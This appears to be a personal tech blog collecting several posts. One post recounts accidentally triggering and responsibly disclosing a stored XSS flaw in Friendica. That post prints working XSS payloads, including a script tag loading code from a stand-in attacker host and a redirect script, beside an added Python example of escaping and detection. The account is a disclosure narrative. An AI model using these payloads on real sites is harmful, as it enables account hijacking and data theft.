Happy 25th birthday, honeypot.net!

In times of yore, my friends gave their computers cool cyberpunky names so that they sounded cool at LAN parties: “Hey, can you toss me an Ethernet cable for suntzu?” “Sure. Here’s the switch I’m using for chaosium.” My Amiga had a few hard drives to store all the, ahem, public domain music files that we traded around. I don’t know what prompted me to think of it as the honeypot full of music, but it stuck, and I christened it honeypot to be one of the cool kids.

I was working at an ISP and handling domain registration tasks for our customers. It struck me as a great idea to one-up my friends and turn my computer’s name into a full-blown domain name. The .org TLD didn’t feel right because I wasn’t an organization, and definitely didn’t identify with .org’s non-profit connotations. .com also felt wrong because I wasn’t some boring company that had decided to hop on to the Internet to see what the fuss was all about. .net had just the right amount of geek cred, so honeypot.net it was.

It was the custom to have a cool and vaguely menacing desktop wallpaper to go with our cool and vaguely menacing handles. If you’ve seen “Hackers”, you’re familiar with those ideas. Here was my pre-honeypot.net background:

How cool was I, right?

That wasn’t good enough to show off my new domain, so I replaced it:

Obligatory Nine Inch Nails-style backward n.

I needed to change things a bit when I acquired a second computer. Instead of using the whole domain name for a single host, I decided on a whim to give each one a name from A. A. Milne’s Winnie-the-Pooh stories. First, Pooh was my childhood stuffed animal best friend, and I still like him. Second, Pooh loves honey, as in a pot of it – a honeypot. Finally, it was an ironic pushback against the scary hacker imagery that was common at the time.

When I registered honeypot.net, about 2 million domains existed. Today there are about 700 million. I wish I’d gotten on the Bitcoin or Apple stock bandwagons that early.

Happy 25th birthday, honeypot.net. We’ve had fun.

Twitter went dark. Now what?

Twitter is in a race with Reddit to see who can ruin their service more quickly. That’s the simplest explanation I have for Twitter’s change today that hides all of their users’ posts behind a login page. Until today, you could still view a favorite company’s messages, or a sport team’s highlights, or an interesting author’s opinions, without logging on to the site. If you wanted to interact with that page by liking a post or replying to it, you needed an account. It was free to view those posts, though. And now, it’s not.

For end users, this immediately devalues Twitter as a way to casually catch up with public figures. For those public figures, this immediately devalues Twitter as a way to broadcast messages to the world. The service still has many users today, of course, and those people won’t go away immediately. But most recent public estimates say that Twitter has about 400 million users, or about 1/10th of the world’s online population. Assuming that all of those accounts are real people, which is a giant assumption, that means about 90% of the world can’t see those messages anymore.

A couple of pieces of free advice for people and organizations still posting to Twitter:

  1. Investigate the alternatives that are open to readers by default. Facebook and friends also make it hard for casual visitors to see messages without logging in. Many brands have flocked to Mastodon, Micro.blog, and newer services like Bluesky.
  2. Track your engagement numbers. If Twitter still reports a similar number of views for your messages after making them inaccessible to 90% of the world, those statistics are probably fake.
  3. Blogs and newsletters still exist, and you have complete control over them. Consider communicating with your most loyal followers over open, easy-to-use channels that everyone can access.
  4. And finally, start working on your Twitter exit strategy. As the site continues to remove the guardrails that kept it relatively civil and brand-safe, it’s only going to become a worse place to hang out.

Quitting Reddit

I’ve spent way more time on Reddit than I should have. I justified it to myself by saying it was a great way to stay current on news and technology trends. Really, it was just a slow drip of tiny endorphin hits that felt good but ultimately didn’t make my life better.

Thanks to Reddit CEO Steve Huffman’s ham-fisted community management and the resulting moderator and user boycott, I deleted its apps off my devices and stopped visiting the site altogether. The first couple of days were difficult, not in the overwhelming craving way that quitting smoking was hard, but because muscle memory kept trying to open the apps the moment I found myself with a few seconds to spare. That, too, passed.

Thanks, Reddit, for breaking my unhealthy addiction to your site. I couldn’t have done it without you.

Fake landlord tried to scam my kid

My kid and their friend are looking for a house to rent. They found a perfect match, with a nice house in a pretty neighborhood and accommodating landlords, but there were a few red flags.

The last was when the landlords wanted my kid and their friend to send them money, supposedly because they live in a different state, and then they’d mail the house keys. The landlord also sent the kids a signed lease to sign and return. The signature on that lease didn’t match up with their name:

Signature from the lease

I did a reverse image search on the signature, and it was L. Ron Hubbard’s signature from his Wikipedia article:

Signature from Wikipedia

I took no joy in breaking the bad news to the kids, but I praised them profusely for talking to me about it first.

Language Server Protocol Launched a Golden Age of Editors

Microsoft developed Language Server Protocol (“LSP”) a few years ago to make it easier to add support for new languages to VS Code. Lots of smart people have written interesting things about LSP and I don’t want to rehash all that, but in summary: it gives people who like using a computer language a standard way to tell VS Code how to work with it.

Thing is, I don’t like VS Code at all. It’s a brilliant program, but under the covers it’s a web browser running a very clever JavaScript program. It doesn’t, and can’t, and won’t, ever feel like a native application, and that bothers me more than it should. I much prefer using what others call Mac-assed Mac apps. This is where LSP shows its real value.

Other apps can support LSP, too. Emacs users wrote a couple of different ways to connect those nifty new language servers to their favorite editor. Voila! Now Emacs has delightful support for every language that VS Code knows how to edit. So does Vim. And now, so do Nova and even the venerable BBEdit.

That last one blew me away. I’d seen it from a distance over the years. It’s impossible to use a Mac as a professional developer without at least being aware that it exists. BBEdit always struck me as a very neat, but very dated, niche editor that people kept using because they were too stubborn to switch. Oh, how wrong I was. I downloaded a copy a couple of weeks ago to kick the tires and found that since it can speak LSP, it might be the best programming environment I’ve ever used on my Mac. (“How’s its Python? Whoa! Is it that good with Rust? Whoa! How about… Terraform files? WHOA!”) 30 years of development as a text editor, plus all the effort that programming language users put into giving LSP broad and deep language support, yielded something that has incredible text mangling abilities and cutting-edge programming features. I love it. I’ve been trialing it as my main editor since then, and every day I appreciate it more.

I think we’re in a new golden age of programming editors. Now that any editor which can use LSP competes on a level playing field, the real competition is in subjective areas like the user interface, responsiveness, ergonomics, and extra functionality. Thanks to VS Code, those Mac-assed Mac apps redefine what developing software on a Mac can be like, and I couldn’t be more pleased with my options.

I use Things without encryption

Update 2023-11-03: No, I don’t.


I tell people not to use Readdle’s Spark email app. Then I turn around and use the Things task manager, which lacks end-to-end encryption (E2EE). That concerns me. I have a PKM note called “Task managers”, and under “Things” my first bullet point is:

  • Lacks end-to-end encryption

I realize I’m being hypocritical here, but perhaps only a little bit. There’s a difference in exposure between Things and, say, my PKM notes, archive of scanned documents, email, etc.:

I don’t put highly sensitive information in Things. No, I don’t want my actions in there to be public, but they’re generally no more detailed than “make an allergist appointment” or “ask boss about a raise”. I know some people use Things as a general note-taking app but I don’t. There are other apps more tailored to that and I use them instead.

I control what information goes into Things. If my doctor were to email me sensitive medical test results, the Spark team could hypothetically read them. Cultured Code can only view what I personally choose to put into Things. (That glosses over the “Mail to Things” feature, but I never give that address to anyone else and I don’t worry about it being misused.)

Things can’t impersonate me. Readdle could use my email credentials to contact my boss and pretend to be me. Now, I’m confident that they won’t. They’re a good, reputable company. But they could, and that’s enough to keep me away from Spark.

Finally, Cultured Code is a German company covered by the GDPR. They have strong governmental reasons not to do shady stuff with my data.

While I don’t like that Things lacks E2EE, and I wish that it had it, the lack isn’t important enough for how I want to use it to keep me away from it. There are more secure alternatives like OmniFocus and Reminders, but the benefits that I get from Things over those options make it worthwhile for me to hold my nose and use it.

Everyone has to make that decision based on their own usage. If you have actions like “send government documents to reporter” or “call patient Amy Jones to tell her about her cancer”, then you shouldn’t use Things or anything else without E2EE. I’d be peeved if my Things actions were leaked, but it wouldn’t ruin my life or get me fired.

But I know I should still look for something more secure.

iA Presenter Public Launch

I’ve used iA Writer on Mac and iPad for years as my main writing environment. I’m typing this in it now. It’s strongly opinionated in the right ways: iA made a lot of design decisions on my behalf so that I’m not distracted by the temptation to fiddle with a thousand configuration knobs instead of, well, writing.

I leaped at the chance to try an early beta of their new iA Presenter app last year. It promised to make writing presentations as easy and pleasant as Writer made it to write words. In fact, their approaches are nearly identical. Both apps encourage you to write down your thoughts, and then they make them look pretty. Oh, how Presenter delivers on that promise! Rather than nudge me toward tweaking fonts, layout, page transitions, and all the other styling options you can possibly apply to a PowerPoint slide, it gives me an editor window where I write Markdown text. Then it renders that text as a series of beautifully styled, elegant slides. And with a couple of clicks, it can publish that presentation as a PDF that mixes slide content with narrator notes in a format that an audience can appreciate.

iA officially launched Presenter today and I bought my (one-time purchase! non-subscription!) license immediately. I’m grateful that I’m not regularly expected to talk to crowds. I’m also grateful that when I do, Presenter exists and saves me from the additional stress of trying to make my content look nice on a screen. It’s everything I love and appreciate about Writer’s approach to public writing, applied to public speaking. Congratulations, iA, and thanks!

Accidentally Hacking the Planet

Last summer I tried to hack the Wall of Sheep at DEF CON. It didn’t work. The short version is that I tried to make a Cross-Site Scripting (XSS) attack against the Wall by crafting a username:

<script type="text/javascript">alert("I was here.");</script>

Because I’m kind of a smartass, I later changed my Mastodon username to something similar:

<script>alert("Tek");</script>

Then I laughed about it with my geeky friends and promptly forgot all about the joke.

And then late at night on Mother’s Day Eve this year, some people started sending me messages like “why is your name popping up on my screen?” and “please make that stop” and “DUDE NO REALLY PLEASE STOP IT”. I had another laugh and tried to go to sleep, until I realized, oh, this isn’t good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script> tag instead of displaying it as the literal text <script>alert("Tek");</script>. In the web world, that’s about as bad as an attack can get. The US government’s CVSS calculator scored it as a perfect 10.0.

  • An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
  • The attack was simple: I changed my username to a bit of valid JavaScript.
  • All I had to do to trigger the vulnerability was to get my username to show up on the victim’s screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim’s timeline, then the trap was sprung.
  • My little joke was annoying but harmless. A malicious attacker could just as easily change their username to
<script src="https://hackerz.ru/badstuff.js">Hi</script>
  • The malicious JavaScript could do literally anything with the victim’s account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.
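As an added illustration (not Friendica’s or Mastodon’s code, and not part of the original post), here is the class of bug in miniature in Python: a template that concatenates a federated display name into HTML as-is, beside the fix of escaping every untrusted value at output time, with the post’s own joke usernames used as constructed sample input.

```python
import html
import re

# Constructed sample input: the display names from the post above, as a
# remote instance would receive them over federation. Note that a length
# limit on the local signup form is no defense here, since the name comes
# from another server's database, not from a local form.
SAMPLE_NAMES = [
    "Tek",
    '<script>alert("Tek");</script>',
    '<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>',
]


def render_post_vulnerable(display_name: str, body: str) -> str:
    """The mistake described above: the display name is inserted into the
    HTML unescaped, so markup inside it becomes real markup and any <script>
    runs in the viewer's browser with the viewer's session."""
    return (f'<div class="post"><span class="author">{display_name}</span>: '
            f'{html.escape(body)}</div>')


def render_post_fixed(display_name: str, body: str) -> str:
    """The fix: every untrusted value is escaped for the HTML text context it
    is inserted into, so the viewer sees the literal text of the name."""
    return (f'<div class="post"><span class="author">'
            f'{html.escape(display_name, quote=True)}</span>: '
            f'{html.escape(body, quote=True)}</div>')


# Matches a live opening script tag; escaped text reads "&lt;script&gt;" and
# does not match. Useful as a cheap regression check in a test suite.
_LIVE_SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(rendered_html: str) -> bool:
    """True if the rendered fragment contains a real <script> tag."""
    return _LIVE_SCRIPT_RE.search(rendered_html) is not None


def demo() -> dict:
    """For each sample name: (vulnerable renderer leaks a live script tag,
    fixed renderer leaks a live script tag)."""
    return {
        name: (contains_live_script(render_post_vulnerable(name, "hello")),
               contains_live_script(render_post_fixed(name, "hello")))
        for name in SAMPLE_NAMES
    }


if __name__ == "__main__":
    for name, (vuln, fixed) in demo().items():
        print(f"{name!r}: vulnerable={vuln} fixed={fixed}")
```

Escaping is applied at render time rather than at storage time so that names stored before the fix, and names arriving from remote servers, are covered too.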

That wasn’t funny at all. I got up and dashed off an email to Friendica’s security email address. I also found that some of the people I’d been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.[1] Satisfied that the right people had been notified, I went back to bed.

The next morning I told my wife and kid about the unexpected evening I’d had. My kid instantly piped up with “Dad! Dad! You should change it to a Rickroll!”[2]

My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother’s Day, I owed this to her. After a little experimentation, I came up with a new username:

<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>

It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance’s database, it was easy to work around that limit.

I began receiving new messages that I’m pretty sure were all in good humor. Well, somewhat sure.

To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week after, the team rolled out a new public release so that all other Friendica admins could patch their systems.

It’s easy to make a mistake. That’s inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.


  1. Because this is how we do it, OK? It’s fine to enjoy that moment of discovery, but when you find a broken window, you let someone know so they can fix it. You don’t go in. And you never, ever use that knowledge to hurt people.

  2. Exact quote from the conversation: “You have the ability to do the funniest thing in history!” That’s overselling it, but I appreciated their enthusiasm.

Favorite apps: PastePal

I used to think the Copied clipboard manager for Apple devices was spiffy. I don’t know how or why, but that app disappeared from the Internet and the App Stores.

PastePal seems to be its spiritual successor. It works perfectly, it syncs across devices, and the pro version is a one-time, reasonable $15 purchase. It’s the only clipboard manager I’ve found that checks all those boxes.

Pianos.

I worked as a software developer with a strongly opinionated manager. He believed that we’d achieve Peak Programmer Productivity™️ by standardizing on one common desktop setup. Of course, that meant we’d all be writing Python code in Eclipse or some other similar abomination that he liked that month. This is for him.


From now on, we’ll all play the piano. This nonsense of everyone knowing a different instrument is costing us time and money. I’ve played the piano for years, and I know you’re going to like it.

Yes, you too, violinists. Vibrato? In my time as a pianist, I’ve never needed it.

Drums? A piano is a percussion instrument. How many kinds of percussion do we need? What’s that? No, they’re not that different. Tempo, rhythms, yes, yes, we’ll still have all that.

Huh, woodwinds. Good point. Well, there are more percussion and string players than woodwind…ists, so they can figure something out.

OK, we’re getting sidetracked here. Look, this is going to be good for you, too! There are more pianos than violins – yes, and clarinets… what’s that? Yes, and probably trumpets, too. Anyway, there are a lot of pianos. The next place you go will probably have a piano, so you’ll have a leg up if you ever leave here. Not that you would, am I right? But see, I’m only thinking of your careers.

Yes, I know we’re picking my favorite instrument. That’s a coincidence. I’ve looked into lots of instruments, but we can all agree that pianos have certain advantages that… Who threw that? Indoor voices, please! Anyway, I’ve looked into lots of instruments… no, I haven’t ever played a flute, but you’ll find that… no, I will not be shoving a piano there, thank you very much!

Alright, meeting’s over. Pianos. That’s what we’re all using, starting — hey, I don’t appreciate that language. Let’s all act like professional adults here.

Pianos.